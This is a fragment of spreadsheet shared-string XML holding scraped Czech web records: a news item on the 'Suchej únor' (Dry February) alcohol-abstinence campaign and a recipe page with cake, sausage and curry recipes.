  <si>
    <t>20250201_131_3889773315_7a7e4fc98f90191ea812.html</t>
  </si>
  <si>
    <t>7a7e4fc98f90191ea812</t>
  </si>
  <si>
    <t>Suchý únor: Kdo nepije, není Čech?</t>
  </si>
  <si>
    <t>Suchý únor: Kdo nepije, není Čech? Rodinná oslava, silvestrovský přípitek, víkendový večírek, návštěva restaurace nebo přátel. Důvodů, proč se napít alkoholu si Češi vždycky najdou dost. Ne náhodou jsme v konzumaci alkoholu na předních příčkách světového žebříčku. I z toho důvodu vznikla iniciativa Suchej únor. Suchý únor Foto: Shutterstock Šárka Nádeníčková 01. 02. 2025 Alkohol lidé znali od nepaměti. Býval součástí různých náboženských rituálů, protože měnil stav vědomí. Využití ale našel i v medicíně a nakonec ho lidé objevili jako prostředek k zábavě. A nastal problém, což se ukazuje i v Česku. V zemi s proslavenou pivní kulturou se s rizikovým pitím potýká až 1,7 milionu lidí. Reklama Autor: Šárka Nádeníčková Autor person Šárka Nádeníčková</t>
  </si>
  <si>
    <t>50150</t>
  </si>
  <si>
    <t>20250201_132_3889777019_ad042976a10a95e74f85.html</t>
  </si>
  <si>
    <t>ad042976a10a95e74f85</t>
  </si>
  <si>
    <t>Část Čechů si ode dneška opět zkusí měsíc nepít alkohol....</t>
  </si>
  <si>
    <t>Část Čechů si ode dneška opět zkusí měsíc nepít alkohol .... Část Čechů si ode dneška opět zkusí měsíc nepít alkohol . Iniciativa Suchej únor se snaží národu pijanů ukázat, že střízlivý pohled na svět má mnohé benefity: zdravotní, psychické, ale třeba i finanční. Rubrika transition_slide Česko</t>
  </si>
  <si>
    <t>70170</t>
  </si>
  <si>
    <t>20250201_133_3889758147_b46200aa8034f41a054c.html</t>
  </si>
  <si>
    <t>b46200aa8034f41a054c</t>
  </si>
  <si>
    <t>Pizza pro milovníky uzenin</t>
  </si>
  <si>
    <t>Pizza pro milovníky uzenin terezabenesova 7 dní před Tohle vypadá jako skvělý recept pro rychlý večer, asi ho zkusím už dneska. Miluju pizzu a uzeniny! 0 Bábovka s lesním ovocem Pokud máte drobné ovoce zamrazené od léta, můžete si tuhle ovocnou hrnkovou bábovku připravit vlastně úplně kdykoli, třeba právě nyní. Ingredience: 2 hrnky polohrubé mouky 1 hrnek cukru krupice 1 prášek do pečiva 1 hrnek mléka ¾ hrnku oleje 2 vejce 1 hrnek drobného ovoce ½ hrnku hrubé mouky Postup: Troubu předehřejte na 170 °C. Cukr vyšlehejte s vejci. […] Špekáčky naložené v pivu Na netradičních utopencích si určitě pochutnáte, se sklenkou vychlazeného piva budou dokonalé. Ingredience: 4 špekáčky 1 žlutá cibule 1 feferonka 2 stroužky česneku 100 ml oleje 50 ml octa 100 ml piva 1 lžíce cukru 1/2 lžičky hořčičných semínek 1/2 lžičky sušeného oregána 2 bobkové listy 5–6 kuliček nového koření 1/2 lžičky čerstvě namletého černého […] Jednoduché kuřecí kari Pokud máte rádi exotické chutě a rychlé recepty, vyzkoušejte kuřecí kari. Podávejte ho ideálně s jasmínovou rýží a užijte si jeho bohatou chuť a vůni. Potřebujete: ✿ 2 kuřecí prsní řízky ✿ 1 červenou papriku ✿ 1 chilli papričku ✿ 400 ml kokosového mléka ✿ 1 lžičku červené kari pasty ✿ ½ limetky ✿ sůl […] Perníková bábovka Stýská se vám po vánočním cukroví? S touto bábovkou jako by tu Vánoce byly v plné parádě znovu. Ingredience: 400 g polohrubé mouky 150 g cukru krystal 1 prášek do perníku 3 vejce 200 ml oleje 200 ml mléka 200 g brusinek čokoládová dortová poleva Postup: Troubu předehřejte na 165 °C. Vejce vyšlehejte s cukrem. Poté přimíchejte olej, mléko, mouku s perníkovým práškem a ¾ brusinek. Těsto […]</t>
  </si>
  <si>
    <t>20250201_134_3889744323_b0ad96deba9ba462775f.html</t>
  </si>
  <si>
    <t>b0ad96deba9ba462775f<